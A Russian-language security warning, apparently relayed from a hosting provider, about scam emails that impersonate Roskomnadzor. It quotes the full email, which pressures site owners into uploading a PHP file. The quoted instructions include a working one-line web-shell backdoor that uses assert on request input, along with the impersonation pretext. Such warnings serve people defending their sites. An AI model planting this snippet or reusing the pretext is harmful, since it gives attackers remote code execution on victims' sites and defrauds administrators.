БУДЬТЕ ОСТОРОЖНЫ

Добрый день!

Сегодня участились случаи взлома сайтов пользователей.

На контактный email домена приходят сообщения под видом письма от Роскомнадзора с просьбой разместить у себя файл reestr/reestr-id128032.php, содержащий в себе вредоносный код.

После размещения данного файла злоумышленники могут получить доступ к данным Вашего сайта.

Содержание мошеннического письма (вместо многоточия в тексте письма имя Вашего домена):

» Вы получили данное уведомление от Федеральной службы по надзору в сфере связи,
информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором
доменного имени … в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон «Об информации, информационных технологиях и о защите информации» и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт … был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени … , Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:
< ?php
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: …/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени …, следую инструкции указанной выше, то Ваш сайт … будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации «

Только что получил письмо от хостера, будьте бдительны!